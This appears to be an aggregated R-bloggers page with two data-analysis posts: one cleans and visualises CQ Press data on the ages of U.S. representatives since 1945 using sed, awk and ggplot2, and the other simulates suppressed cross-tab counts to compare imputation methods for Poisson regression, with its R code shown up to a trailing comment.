Results for 79th Congress , Last,First,Middle,Suffix,Nickname,Born,Death,Sex,Position,Party,State,District,Start,End,Religion,Race,Educational Attainment,JobType1,JobType2,JobType3,JobType4,JobType5,Mil1,Mil2,Mil3 Abernethy,Thomas,Gerstle,,,05/16/1903,01/23/1953,M,U.S. Representative,Democrat,MS,4,01/03/1945,01/03/1953,Methodist,White,Professional degree,Law,,,,,Did not serve,, Adams,Sherman,,,,01/08/1899,10/27/1986,M,U.S. Representative,Republican,NH,2,01/03/1945,01/03/1947,Not specified,White,Bachelor's degree,Construction/building trades,,,,,,,

The bottom of each file looks like this:

Young,Milton,Ruben,,,12/06/1897,05/31/1983,M,U.S. Senator,Republican,ND,,03/19/1945,01/03/1981,Mormon,White,Unknown,Agriculture,,,,,Did not serve,, Zimmerman,Orville,,,,12/31/1880,04/07/1948,M,U.S. Representative,Democrat,MO,10,01/03/1945,04/07/1948,Methodist,White,Professional degree,Education,Law,,,,Army,, , , "Export list of members by biographical characteristics. Washington: CQ Press. Dynamically generated November 10, 2018, from CQ Press Electronic Library, CQ Press Congress Collection: http://library.cqpress.com/congress/export.php?which=memberbioadv&congress=198&yearlimit=0"

To make the files readable in R, the first thing we’ll want to do is strip the first two lines of each file and the last three lines of each file. (Of course I checked first to make sure each file was the same in this regard.) There are several ways to get rid of specific lines from files. The venerable sed command is one. We loop it over each CSV file, telling it to delete (d) lines 1 and 2:

## Remove first two lines from each csv file for i in *.csv; do sed -i.orig '1,2d' $i done

The -i.orig option makes a copy of the original file first, appending a .orig extension to the filename.

We do the same thing to delete the last three lines of each file. You can use some versions of head to do this quite easily, because they accept a negative number to their -n argument. Thus, while head -n 3 usually returns the first three lines of a file, head -n -3 will show you all but the last three lines. But the version of head that ships with macOS won’t do this. So I used sed again, this time taking advantage of Stack Overflow to find the following grotesque incantation:

## Remove last three lines from each csv file for i in *.csv; do sed -i.orig -e :a -e '1,3!{P;N;D;};N;ba' $i done

The -e :a is a label for the expression, and the '1,3!{P;N;D;};N;ba' is where the work gets done, streaming through the file till it locates the end, deletes that line, and then branches (b) back to the labeled script again (a) until it’s done it three times. Gross.

You could also do this using a combination of wc (to get a count of the number of lines in the file) and awk, like this:

awk -v n=$(($(wc -l < file) - 3)) 'NR <= n' file

There’s a reason people used to say sed and awk had those names because of the sounds people made when forced to use them.

Anyway, now we have a folder full of clean CSV files. Time to fire up R and get to the fun part.

Inside R, we get a vector of our filenames:

filenames <- dir(path = "data/clean", pattern = "*.csv", full.names = TRUE) filenames #> [1] "data/clean/01_79_congress.csv" "data/clean/02_80_congress.csv" #> [3] "data/clean/03_81_congress.csv" "data/clean/04_82_congress.csv" #> [5] "data/clean/05_83_congress.csv" "data/clean/06_84_congress.csv" #> [7] "data/clean/07_85_congress.csv" "data/clean/08_86_congress.csv" #> [9] "data/clean/09_87_congress.csv" "data/clean/10_88_congress.csv" #> [11] "data/clean/11_89_congress.csv" "data/clean/12_90_congress.csv" #> [13] "data/clean/13_91_congress.csv" "data/clean/14_92_congress.csv" #> [15] "data/clean/15_93_congress.csv" "data/clean/16_94_congress.csv" #> [17] "data/clean/17_95_congress.csv" "data/clean/18_96_congress.csv" #> [19] "data/clean/19_97_congress.csv" "data/clean/20_98_congress.csv" #> [21] "data/clean/21_99_congress.csv" "data/clean/22_100_congress.csv" #> [23] "data/clean/23_101_congress.csv" "data/clean/24_102_congress.csv" #> [25] "data/clean/25_103_congress.csv" "data/clean/26_104_congress.csv" #> [27] "data/clean/27_105_congress.csv" "data/clean/28_106_congress.csv" #> [29] "data/clean/29_107_congress.csv" "data/clean/30_108_congress.csv" #> [31] "data/clean/31_109_congress.csv" "data/clean/32_110_congress.csv" #> [33] "data/clean/33_111_congress.csv" "data/clean/34_112_congress.csv" #> [35] "data/clean/35_113_congress.csv" "data/clean/36_114_congress.csv" #> [37] "data/clean/37_115_congress.csv" "data/clean/38_116_congress.csv"

Then, instead of writing a for loop and doing a bunch of rbind-ing, we can pipe our vector of filenames to the map_dfr() function and we’re off to the races:

data <- filenames %>% map_dfr(read_csv, .id = "congress") colnames(data) <- to_snake_case(colnames(data)) data #> # A tibble: 20,111 x 26 #> congress last first middle suffix nickname born death sex position party #> #> 1 1 Aber… Thom… Gerst… NA NA 05/1… 01/2… M U.S. Re… Demo… #> 2 1 Adams Sher… NA NA NA 01/0… 10/2… M U.S. Re… Repu… #> 3 1 Aiken Geor… David NA NA 08/2… 11/1… M U.S. Se… Repu… #> 4 1 Allen Asa Leona… NA NA 01/0… 01/0… M U.S. Re… Demo… #> 5 1 Allen Leo Elwood NA NA 10/0… 01/1… M U.S. Re… Repu… #> 6 1 Almo… J. Linds… Jr. NA 06/1… 04/1… M U.S. Re… Demo… #> 7 1 Ande… Herm… Carl NA NA 01/2… 07/2… M U.S. Re… Repu… #> 8 1 Ande… Clin… Presba NA NA 10/2… 11/1… M U.S. Re… Demo… #> 9 1 Ande… John Zuing… NA NA 03/2… 02/0… M U.S. Re… Repu… #> 10 1 Andr… Augu… Herman NA NA 10/1… 01/1… M U.S. Re… Repu… #> # ... with 20,101 more rows, and 15 more variables: state , #> # district , start , end , religion , race , #> # educational_attainment , job_type_1 , job_type_2 , #> # job_type_3 , job_type_4 , job_type_5 , mil_1 , #> # mil_2 , mil_3

A little data-cleaning later, the congress variable is properly numbered and we’re good to go. The to_snake_case() function comes from the snakecase package.
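
The renumbering itself isn’t shown in the post; a plausible sketch (our assumption, not the author’s code) is that the .id column from map_dfr() is the file index as a character vector, and file 1 corresponds to the 79th Congress:

## Hypothetical cleaning step: convert the file index to the actual Congress number
data <- data %>%
  mutate(congress = as.integer(congress) + 78)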

The data are observed at the level of congressional terms. So, for example, we can draw a heatmap of the age distribution of U.S. representatives across the dataset:

age_counts <- data_all %>% filter(position == "U.S. Representative", party %in% c("Democrat", "Republican")) %>% mutate(binned_age = Hmisc::cut2(start_age, g = 30), binned_age2 = Hmisc::cut2(start_age, cuts = c(30:80))) %>% group_by(party, start_year, binned_age2) %>% tally() %>% mutate(freq = n / sum(n), pct = round((freq*100), 1)) age_counts #> # A tibble: 3,952 x 6 #> # Groups: party, start_year [76] #> party start_year binned_age2 n freq pct #> #> 1 Democrat 1945-01-03 [24,30) 0 0 0 #> 2 Democrat 1945-01-03 30 1 0.00385 0.4 #> 3 Democrat 1945-01-03 31 2 0.00769 0.8 #> 4 Democrat 1945-01-03 32 1 0.00385 0.4 #> 5 Democrat 1945-01-03 33 1 0.00385 0.4 #> 6 Democrat 1945-01-03 34 4 0.0154 1.5 #> 7 Democrat 1945-01-03 35 2 0.00769 0.8 #> 8 Democrat 1945-01-03 36 4 0.0154 1.5 #> 9 Democrat 1945-01-03 37 4 0.0154 1.5 #> 10 Democrat 1945-01-03 38 12 0.0462 4.6 #> # ... with 3,942 more rows p <- ggplot(age_counts, aes(x = start_year, y = binned_age2, fill = n)) p_out <- p + geom_tile() + scale_fill_viridis_c(option = "A") + scale_x_date(breaks = int_to_year(seq(1950, 2010, by = 10), 01, 03), date_labels = "%Y", limits = c(int_to_year(1945), int_to_year(2019, 2, 1))) + scale_y_discrete(breaks = c(29, 30, 40, 50, 60, 70, 79, 80)) + facet_wrap(~ party) + labs(title = "Age Distribution of U.S. Representatives, 1945-2019", x = "Year", y = "Age", fill = "Number of Representatives", caption = caption_text) + theme(legend.position = "top", legend.box.just = "top") p_out

Age distribution heatmap

Or we can look at it a different way, using the ggbeeswarm package. We layer a few different pieces here: a trend line for average age, a ribbon showing the 25th and 75th percentiles of the age distribution, the distribution itself (excluding its oldest and youngest 1%), and the names of the representatives in the oldest and youngest percentiles. We’ll create a separate dataset for each of these pieces.

age_counts <- data_all %>% filter(position == "U.S. Representative", party %in% c("Democrat", "Republican")) %>% group_by(party, start_year, start_age) %>% tally() %>% mutate(freq = n / sum(n), pct = round((freq*100), 1)) %>% arrange(desc(start_year)) mean_age_swarm <- data_all %>% filter(position == "U.S. Representative", party %in% c("Democrat", "Republican")) %>% group_by(congress, party) %>% summarize(year = first(start_year), mean_age = mean(start_age), lo = quantile(start_age, 0.25), hi = quantile(start_age, 0.75)) %>% mutate(yr_fac = factor(year(year))) oldest_group_by_year <- data_all %>% filter(party %in% c("Democrat", "Republican"), position == "U.S. Representative") %>% group_by(congress, party) %>% filter(start_age > quantile(start_age, 0.99)) youngest_group_by_year <- data_all %>% filter(party %in% c("Democrat", "Republican"), position == "U.S. Representative") %>% group_by(congress, party) %>% filter(start_age < quantile(start_age, 0.01))

Here’s what they look like:

age_counts #> # A tibble: 3,410 x 6 #> # Groups: party, start_year [76] #> party start_year start_age n freq pct #> #> 1 Democrat 2019-01-03 29 1 0.00448 0.4 #> 2 Democrat 2019-01-03 30 1 0.00448 0.4 #> 3 Democrat 2019-01-03 31 1 0.00448 0.4 #> 4 Democrat 2019-01-03 32 2 0.00897 0.9 #> 5 Democrat 2019-01-03 34 2 0.00897 0.9 #> 6 Democrat 2019-01-03 35 2 0.00897 0.9 #> 7 Democrat 2019-01-03 37 3 0.0135 1.3 #> 8 Democrat 2019-01-03 38 5 0.0224 2.2 #> 9 Democrat 2019-01-03 39 4 0.0179 1.8 #> 10 Democrat 2019-01-03 40 5 0.0224 2.2 #> # ... with 3,400 more rows mean_age_swarm #> # A tibble: 76 x 7 #> # Groups: congress [38] #> congress party year mean_age lo hi yr_fac #> #> 1 79 Democrat 1945-01-03 51.5 42 59 1945 #> 2 79 Republican 1945-01-03 52.8 46 59 1945 #> 3 80 Democrat 1947-01-03 50.5 43 58 1947 #> 4 80 Republican 1947-01-03 52.0 45 59 1947 #> 5 81 Democrat 1949-01-03 49.4 42 56 1949 #> 6 81 Republican 1949-01-03 53.7 47 61 1949 #> 7 82 Democrat 1951-01-03 50.8 43 57 1951 #> 8 82 Republican 1951-01-03 53.8 46.5 61 1951 #> 9 83 Democrat 1953-01-03 50.7 43 57 1953 #> 10 83 Republican 1953-01-03 52.9 46 60 1953 #> # ... with 66 more rows oldest_group_by_year #> # A tibble: 181 x 38 #> # Groups: congress, party [76] #> congress last first middle suffix nickname born death sex #> #> 1 79 Doug… Robe… Lee NA NA 1863-11-07 1954-10-01 M #> 2 79 Mans… Jose… J. NA NA 1861-02-09 1947-07-12 M #> 3 79 Eaton Char… Aubrey NA NA 1868-03-29 1953-01-23 M #> 4 79 Welch Rich… Joseph NA NA 1869-02-13 1949-09-10 M #> 5 80 Doug… Robe… Lee NA NA 1863-11-07 1954-10-01 M #> 6 80 Mans… Jose… J. NA NA 1861-02-09 1947-07-12 M #> 7 80 Saba… Adol… Joach… NA NA 1866-04-04 1952-11-06 M #> 8 80 Eaton Char… Aubrey NA NA 1868-03-29 1953-01-23 M #> 9 80 Lewis Will… NA NA NA 1868-09-22 1959-08-08 M #> 10 81 Bloom Sol NA NA NA 1870-03-09 1949-03-07 M #> # ... with 171 more rows, and 29 more variables: position , party , #> # state , district , start , end , religion , #> # race , educational_attainment , job_type_1 , #> # job_type_2 , job_type_3 , job_type_4 , job_type_5 , #> # mil_1 , mil_2 , mil_3 , start_year , end_year , #> # name_dob , pid , start_age , poc , days_old , #> # months_old , full_name , end_career , entry_age , #> # yr_fac youngest_group_by_year #> # A tibble: 163 x 38 #> # Groups: congress, party [76] #> congress last first middle suffix nickname born death sex #> #> 1 79 Beck… Lind… Gary NA NA 1913-06-30 1984-03-09 M #> 2 79 Foga… John Edward NA NA 1913-03-23 1967-01-10 M #> 3 79 Ryter John Franc… NA NA 1914-02-04 1978-02-05 M #> 4 79 Benn… Mari… Tinsl… NA NA 1914-06-06 2000-09-06 M #> 5 79 Byrn… John Willi… NA NA 1913-06-12 1985-01-12 M #> 6 80 Bent… Lloyd Milla… Jr. NA 1921-02-11 2006-05-23 M #> 7 80 Kenn… John Fitzg… NA NA 1917-05-29 1963-11-22 M #> 8 80 Will… John Bell NA NA 1918-12-04 1983-03-25 M #> 9 80 Nodar Robe… Joseph Jr. NA 1916-03-23 1974-09-11 M #> 10 80 Pott… Char… Edward NA NA 1916-10-30 1979-11-23 M #> # ... with 153 more rows, and 29 more variables: position , party , #> # state , district , start , end , religion , #> # race , educational_attainment , job_type_1 , #> # job_type_2 , job_type_3 , job_type_4 , job_type_5 , #> # mil_1 , mil_2 , mil_3 , start_year , end_year , #> # name_dob , pid , start_age , poc , days_old , #> # months_old , full_name , end_career , entry_age , #> # yr_fac

Now we can draw a graph, faceted by Party:

## Don't show points for the people we're naming exclude_pid <- c(oldest_group_by_year$pid, youngest_group_by_year$pid) party_names <- c(`Democrat` = "Democrats", `Republican` = "Republicans") p <- ggplot(data = subset(data_all, party %in% c("Democrat", "Republican") & position == "U.S. Representative" & pid %nin% exclude_pid), mapping = aes(x = yr_fac, y = start_age, color = party, label = last)) p_out <- p + geom_quasirandom(size = 0.1, alpha = 0.4, method = "pseudorandom", dodge.width = 1) + # mean age trend geom_line(data = mean_age_swarm, mapping = aes(x = yr_fac, y = mean_age, color = party, group = party), inherit.aes = FALSE, size = 1, alpha = 0.5) + # 25/75 percentile ribbon geom_ribbon(data = mean_age_swarm, mapping = aes(x = yr_fac, ymin = lo, ymax = hi, color = NULL, fill = party, group = party), inherit.aes = FALSE, alpha = 0.2) + # Named outliers geom_text(data = oldest_group_by_year, size = 0.9, alpha = 1, position = position_jitter(width = 0.4, height = 0.4)) + geom_text(data = youngest_group_by_year, size = 0.9, alpha = 1, position = position_jitter(width = 0.4, height = 0.4)) + # Hackish compromise to label years: # we can't use a date object with the beeswarm plot, only a factor scale_x_discrete(breaks = levels(data_all$yr_fac)[c(T, rep(F, 4))]) + scale_color_manual(values = party_colors) + scale_fill_manual(values = party_colors) + guides(color = FALSE, fill = FALSE) + labs(x = "Year", y = "Age", title = "Age Distribution of Congressional Representatives, 1945-2019", subtitle = "Trend line is mean age; bands are 25th and 75th percentiles of the range.\n\n Youngest and oldest percentiles are named instead of being shown by points.", caption = caption_text) + facet_wrap( ~ party, nrow = 1, labeller = as_labeller(party_names)) + theme(plot.subtitle = element_text(size = 10))

Age trends, distributions, and outliers.

That one might be easier to see as a PDF.

Finally, here’s a neat trick. One thing I was interested in was changes in the composition of the so-called “Freshman Class” of representatives over time: people elected to the House for the very first time. To extract that subset, I needed to create a term_id nested within each person’s unique identifier (their pid). I knew which Congressional session each person-term was in, and just needed to count from the first to the last. I’m sure there’s more than one way to do it, but here’s a solution:

first_terms <- data_all %>% filter(position == "U.S. Representative", start > "1945-01-01") %>% group_by(pid) %>% nest() %>% mutate(data = map(data, ~ mutate(.x, term_id = 1 + congress - first(congress)))) %>% unnest() %>% filter(term_id == 1) first_terms #> > # A tibble: 2,998 x 39 #> pid congress last first middle suffix nickname born death sex #> #> 1 1 79 Aber… Thom… Gerst… NA NA 1903-05-16 1953-01-23 M #> 2 2 79 Adams Sher… NA NA NA 1899-01-08 1986-10-27 M #> 3 4 79 Allen Asa Leona… NA NA 1891-01-05 1969-01-05 M #> 4 5 79 Allen Leo Elwood NA NA 1898-10-05 1973-01-19 M #> 5 6 79 Almo… J. Linds… Jr. NA 1898-06-15 1986-04-14 M #> 6 7 79 Ande… Herm… Carl NA NA 1897-01-27 1978-07-26 M #> 7 9 79 Ande… John Zuing… NA NA 1904-03-22 1981-02-09 M #> 8 10 79 Andr… Augu… Herman NA NA 1890-10-11 1958-01-14 M #> 9 13 79 Andr… Walt… Gresh… NA NA 1889-07-16 1949-03-05 M #> 10 14 79 Ange… Homer Daniel NA NA 1875-01-12 1968-03-31 M #> # ... with 2,988 more rows, and 29 more variables: position , party , #> # state , district , start , end , religion , #> # race , educational_attainment , job_type_1 , #> # job_type_2 , job_type_3 , job_type_4 , job_type_5 , #> # mil_1 , mil_2 , mil_3 , start_year , end_year , #> # name_dob , start_age , poc , days_old , #> # months_old , full_name , end_career , entry_age , #> # yr_fac , term_id

The trick here is the mutate(data = map(data, ~ mutate(.x, term_id = 1 + congress - first(congress)))) line, which nests one mutate call inside another. We group the data by pid and nest() it, so it’s as if we have a separate table for each representative. Then we use map() to add a term_id column to each subtable. Once we have a per-person term_id and grab everyone’s first term, we can, for example, take a look at the breakdown of freshman representatives by gender for every session since 1945:

First-term representatives by gender, 1945-2019

And also to break that out by Party:

First-term representatives by gender and party, 1945-2019


To leave a comment for the author, please follow the link and comment on their blog: R on kieranhealy.org.

A more systematic look at suppressed data by @ellis2013nz

Sat, 11/17/2018 - 14:00

(This article was first published on free range statistics - R, and kindly contributed to R-bloggers)

Last week I blogged about some different ways of dealing with data in a cross tab that has been suppressed as a means of disclosure control, when the count in a cell is less than six. I tried simple replacement of those cells with “3”, two different multiple imputation methods, and left-censored Poisson regression based on survival methods. I tested those methods on a single two-way simulated cross-tab of the counts of three different types of animals in four different regions, with two suppressed cells.

An obvious piece of unfinished business is to extend the comparison I made to many different randomly generated tables. I have now done this, and I’ve also extended the methods I’m comparing to cover three different multiple imputation methods and four different simple substitutions (with 0, 1, 3 and 5).

Because my tables are generated by a data generating process under my control, I know the true values of the coefficients for the fully saturated Poisson family generalized linear model that is used to analyse each table with each imputation method. So I can compare the true coefficients with those from each method, including using the full observed data (as though you had access to it, perhaps because you work for the agency that suppressed the data in the first instance). Note – if a fully saturated Poisson family generalized linear model sounds complicated, remember that it is equivalent to the Chi square test for independence of variables in a cross tab, which is usually one of the first two or three tools taught in a basic statistics methods class.
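
As a minimal sketch of the model being described (assuming a data frame called tab holding the cross-tab counts, with columns named as in the example data shown at the end of this post):

## Fully saturated Poisson GLM on a two-way cross tab
fit <- glm(count ~ animals * region, family = poisson, data = tab)
coef(fit)  # the non-intercept coefficients are what the methods are compared on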

Some surprising results

It’s fair to say the results surprised me.

  • The best of the nine methods was simply to replace all values below six with the number 5
  • Four of the methods delivered better results on average in uncovering the true data generating process than did fitting the model to the real, unsuppressed data
  • My multiple imputation method, which draws numbers from zero to five with probabilities based on a truncated Poisson distribution, is the best of the fancier methods, but only very slightly better than the default imputation from the mice package, which allows imputed values greater than 5 even though we know the true values cannot be that large
  • Left-censored Poisson regression with survival analysis methods still performs relatively poorly.

My simulations generated tables with between two and ten columns and between two and ten rows. All the true coefficients for effect sizes, including interactions, were drawn from a uniform distribution between -1 and 1. The intercept was drawn from a uniform distribution between 1 and 3. The intercept was excluded from the calculation of the mean squared error of the coefficients, because it’s usually not of substantive interest and because it is on a different scale to the other coefficients.
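
In condensed form, that data generating process looks like this (the full version, with the suppression and replacement columns, is in the Code section below):

data <- expand.grid(animals = letters[1:sample(2:10, 1)],
                    region  = LETTERS[1:sample(2:10, 1)])
mm         <- model.matrix(~ animals * region, data = data)
true_coefs <- c(runif(1, 1, 3), runif(ncol(mm) - 1, -1, 1))      # intercept, then effects
data$count <- rpois(nrow(data), lambda = exp(mm %*% true_coefs))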

Looking at the relationship of error in coefficients to the size of the table and to the proportion of cells that were suppressed for being below six, we get these charts:

There are some interesting findings here too:

  • all methods perform worse as the proportion of cells under six increases, but the effect is stronger for the poorer performing methods
  • all methods perform worse with more coefficients to estimate, but this effect is strongest for the method using the unsuppressed data
  • the performance of the method using the unsuppressed data is clearly bimodal, with a cluster of poorly performing models well separated from an otherwise good performance.

Unusual behaviour of the model with the full unsuppressed data

This last point about the bimodal performance of the model with the full unsuppressed data is particularly interesting. It wasn’t obvious in my first boxplot because, while that’s a nice simple comparison graphic, it will usually hide bimodality in a distribution. Here are density plots instead:

It’s worth having a closer look at this. Unlike the other methods, using the full data normally performs exceptionally well (as would be expected) but sometimes extremely badly. Is there any pattern? Let’s look at a plot of the mean squared error across the size of the cross tab and the proportion of cells that were suppressed, just for the method that uses the full data despite suppression:

There’s a definite pattern that the more of the data were below 6, the worse this model does, but there are still occasions when, even with half the data below 6, the model does OK (small reddish dots).

Luckily I had written the function that compares the models so that it is reproducible and can return the full set of coefficients. I had a look at one run where the full data model performed particularly poorly, number 125. Here is the actual data for run 125:

animals  region  count    expected
a        A           0   4.9508590
b        A           5   3.7161291
c        A           6  12.5528917
d        A          17  12.6124215
e        A           2   5.2896170
f        A           1   3.5390988
g        A          10   6.7345340
h        A           6   6.2255400
i        A           3   1.8735223
a        B           7   8.3839561
b        B           5   2.8352860
c        B          20  23.8147302
d        B          21  18.3545554
e        B           6   7.6222396
f        B          14  14.2599204
g        B          18  16.0890494
h        B          17  17.6865488
i        B           2   2.4653642
a        C           5   3.7365829
b        C           1   4.4282008
c        C          15  13.6843526
d        C           6   6.3213678
e        C           7   4.6640287
f        C           4   1.1177665
g        C           9   8.5946791
h        C           1   2.2103981
i        C           0   0.7286345

… and here are the coefficients from all the models, compared to the true coefficients of the underlying data generating process:

So that’s interesting. It’s revealing that the full data model performs badly in a similar way to the absurd “replace all suppressed cells with zero” model. What’s going on here is that the observed data has an unusual number of very low values (e.g. a-A-0, f-A-1, b-C-1). The low values lead to a very unstable estimate of our Poisson regression model, with coefficients leaping to +25 or -25 (when the real values are between -1 and 1). This happens in enough runs that these wildly underperforming models completely mess up the overall record of the full data model.

What we’re seeing here is that this sort of model – a Poisson family GLM fit to a cross tab – performs erratically (and can deliver ridiculous results) when many of the counts are low. This, of course, has been known since the early days of the Chi square test and the accompanying warning not to use it when expected counts are less than five.
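
A tiny self-contained illustration of that instability, on invented data: a single empty cell in a saturated Poisson GLM pushes the corresponding coefficient towards minus infinity.

d <- expand.grid(animal = c("a", "b"), region = c("A", "B"))
d$count <- c(4, 7, 5, 0)                           # one empty cell
coef(glm(count ~ animal * region, data = d, family = "poisson"))
# the interaction estimate comes back as a huge negative number with an enormous
# standard error -- the same kind of wild coefficient seen in run 125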

A probable solution is clear – some kind of shrinkage of coefficient estimates, either through regularization if we’re a frequentist or a more sensible prior if we’re a Bayesian. Then I suspect the full data model would perform quite adequately.
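
As a rough sketch of what that shrinkage could look like (an illustration with the glmnet package, not something tested here), a ridge-penalised Poisson fit pulls the coefficient estimates back towards zero:

library(glmnet)

set.seed(123)
d <- expand.grid(animals = letters[1:5], region = LETTERS[1:4])
d$count <- rpois(nrow(d), lambda = 4)                      # toy cross tab with some low counts
X <- model.matrix(~ animals * region, data = d)[, -1]      # glmnet supplies its own intercept
fit <- glmnet(X, d$count, family = "poisson", alpha = 0,   # alpha = 0 gives ridge shrinkage
              lambda = 0.5)                                # illustrative penalty, not tuned
coef(fit)                                                  # estimates pulled towards zero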

Code

Here’s the R code for today’s exercise, all in one chunk:

library(tidyverse) library(mice) library(VGAM) library(Cairo) library(parallel) #------------------ imputation functions---------- #' Imputation function for suppressed data for use with mice - Poisson-based #' #' @param y vector to be imputed #' @param ry logical vector of observed (TRUE) and missing (FALSE) values of y #' @param x design matrix. Ignored but is probably needed for mice to use. #' @param wy vector that is TRUE where imputations are created for y. Not sure when this is different #' to just !ry (which is the default). mice.impute.desuppress <- function (y, ry, x, wy = NULL, max_value = 5, ...) { # during dev: # y <- data$censored_count_num; ry <- !is.na(y) if (is.null(wy)){ wy <- !ry } # What are the relative chances of getting values from 0 to the maximum allowed value, # if we have a Poisson distribution which we have estimated the mean of via trimmed mean? # (this is very approximate but probably better than just giving equal chances to 0:5) probs <- dpois(0:max_value, mean(y[ry], tr = 0.2)) return(sample(0:max_value, sum(wy), prob = probs, replace = TRUE)) } #' Imputation function for suppressed data for use with mice - simple #' mice.impute.uniform <- function (y, ry, x, wy = NULL, max_value = 5, ...) { if (is.null(wy)){ wy <- !ry } return(sample(0:max_value, sum(wy), replace = TRUE)) } #--------------main function--------------- # This function generates data and compares coefficients coefs_comp <- function(run, output = c("summary", "all")){ set.seed(run) output <- match.arg(output) data <- expand.grid(animals = letters[1:sample(2:10, 1)], region = LETTERS[1:sample(2:10, 1)], count = 1) n <- nrow(data) mm <- model.matrix(count ~ animals * region, data = data) true_coefs <- c(runif(1, 1, 3), runif(n - 1, -1, 1)) data <- data %>% mutate(expected = exp(mm %*% true_coefs), count = rpois(n, lambda = exp(mm %*% true_coefs)), censored_count = ifelse(count < 6, "<6", count), censored_count_num = suppressWarnings(as.numeric(censored_count)), count_replaced_5 = ifelse(count < 6, 5, count), count_replaced_3 = ifelse(count < 6, 3, count), count_replaced_1 = ifelse(count < 6, 1, count), count_replaced_0 = ifelse(count < 6, 0, count)) data$z <- pmax(6, data$count) data$lcensored <- is.na(data$censored_count_num ) prop_suppressed <- mean(data$lcensored) data$which_complete <- as.numeric(!data$lcensored) if(prop_suppressed > 0.5){ return(NULL) } else { #--------------straightforward methods----------- # with the full unsuppressed data, as though you were the ABS: mod0 <- glm(count ~ animals * region, data = data, family = "poisson") # with replacing the suppressed data with 3 or 5: mod1 <- glm(count_replaced_3 ~ animals * region, data = data, family = "poisson") mod2 <- glm(count_replaced_5 ~ animals * region, data = data, family = "poisson") mod2a <- glm(count_replaced_1 ~ animals * region, data = data, family = "poisson") mod2b <- glm(count_replaced_0 ~ animals * region, data = data, family = "poisson") #------------with censored poisson regression------------------------- mod3 <- vglm(SurvS4(z, which_complete, type = "left") ~ animals * region, family = cens.poisson, data = data) #------------with multiple imputation # number of sets of imputations to make m <- 20 # See https://github.com/stefvanbuuren/mice/issues/150 for why remove.collinear = FALSE. 
data_imp1 <- mice(data[ , c("censored_count_num", "animals", "region")], method = "desuppress", print = FALSE, m = m, remove.collinear = FALSE) data_imp2 <- mice(data[ , c("censored_count_num", "animals", "region")], method = "uniform", print = FALSE, m = m, remove.collinear = FALSE) # default mice method: data_imp3 <- mice(data[ , c("censored_count_num", "animals", "region")], print = FALSE, m = m, remove.collinear = FALSE) mod_mice1 <- with(data_imp1, glm(censored_count_num ~ animals * region, family = "poisson")) coef_mice1 <- pool(mod_mice1)$pooled$estimate mod_mice2 <- with(data_imp2, glm(censored_count_num ~ animals * region, family = "poisson")) coef_mice2 <- pool(mod_mice2)$pooled$estimate mod_mice3 <- with(data_imp3, glm(censored_count_num ~ animals * region, family = "poisson")) coef_mice3 <- pool(mod_mice3)$pooled$estimate #---------------results---------------------- # comparison data d <- data_frame(underlying = true_coefs, `Using full data including suppressed values (not usually possible!)` = coef(mod0), `Replacing suppressed values with 0` = coef(mod2b), `Replacing suppressed values with 1` = coef(mod2a), `Replacing suppressed values with 3` = coef(mod1), `Replacing suppressed values with 5` = coef(mod2), `Left-censored survival-based method` = coef(mod3), `MICE with Poisson proportional probabilities` = coef_mice1, `MICE with uniform probabilities` = coef_mice2, `MICE with default imputation` = coef_mice3, labels = names(coef(mod0))) %>% mutate(labels = gsub("animals", "", labels), labels = gsub("region", "", labels)) %>% gather(method, value, -underlying, -labels) %>% mutate(value = ifelse(is.na(value), 0, value)) # summary data: d2 <- d %>% # the intercept is on a different scale to all the other coefficients filter(labels != "(Intercept)") %>% mutate(square_error = (value - underlying) ^ 2) %>% group_by(method) %>% summarise(mse = mean(square_error), trmse = mean(square_error, tr = 0.2)) %>% ungroup() %>% mutate(method = fct_reorder(method, mse)) %>% arrange(trmse) %>% mutate(method = fct_reorder(method, trmse)) %>% mutate(run = run, prop_suppressed = prop_suppressed, n = n) if(output == "summary"){ return(d2) } if(output == "all"){ return(list( all_coefficients = d, performance_summary = d2, data = data )) } } } #--------------------do the runs---------------- # It was useful to do this in a single-threaded way during dev to locate problems such # as with run 357, but when that was sorted it was better to dso the experiments with # parallel processing. 
# set up cluster with number of cores minus one cores <- detectCores() cluster <- makePSOCKcluster(max(1, cores - 1)) # set up the functionality on the cluster clusterEvalQ(cluster, { library(dplyr) library(tidyr) library(forcats) library(mice) library(VGAM) }) clusterExport(cluster, c("coefs_comp", "mice.impute.desuppress", "mice.impute.uniform")) # Generate data for a sequence of seeds and compare the coefficient from the various methods results <- parLapply(cluster, 1:1000, coefs_comp) stopCluster(cluster) #--------------------present results------------------- results_df <- do.call("rbind", results) %>% mutate(method = fct_reorder(str_wrap(method, 27), mse)) summary(results_df) results_df %>% ggplot(aes(x = method, y = mse)) + geom_boxplot() + scale_y_log10() + coord_flip() + labs(y = "Mean squared error of coefficients, compared to true data generating process", x = "") + ggtitle("Fitting a Poisson GLM to a cross tab of counts", "Comparison of methods of dealing with suppressed counts under 6") results_df %>% ggplot(aes(x = prop_suppressed, y = mse)) + facet_wrap(~method) + geom_point(size = 0.3) + scale_y_log10() + geom_smooth(method = "lm") + labs(y = "Mean squared error of coefficients,\ncompared to true data generating process", x = "Proportion of cells in original data that are under 6") + ggtitle("Fitting a Poisson GLM to a cross tab of counts", "Comparison of methods of dealing with suppressed counts under 6") results_df %>% ggplot(aes(x = n, y = mse)) + facet_wrap(~method) + geom_point(size = 0.3) + scale_y_log10() + geom_smooth(method = "lm") + labs(y = "Mean squared error of coefficients,\ncompared to true data generating process", x = "Number of coefficients to estimate") + ggtitle("Fitting a Poisson GLM to a cross tab of counts", "Comparison of methods of dealing with suppressed counts under 6") #--------------further investigation---------- results_df %>% ggplot(aes(x = mse)) + facet_wrap(~method) + geom_density(fill = "steelblue", alpha = 0.5) + scale_x_log10(label = comma, breaks = c(0.1, 0.3, 1, 3, 10, 100)) + ggtitle("Bimodal distribution of performance when using the real data") + theme(panel.grid.minor = element_blank()) # which are the really poor performing methods when using the full data? 
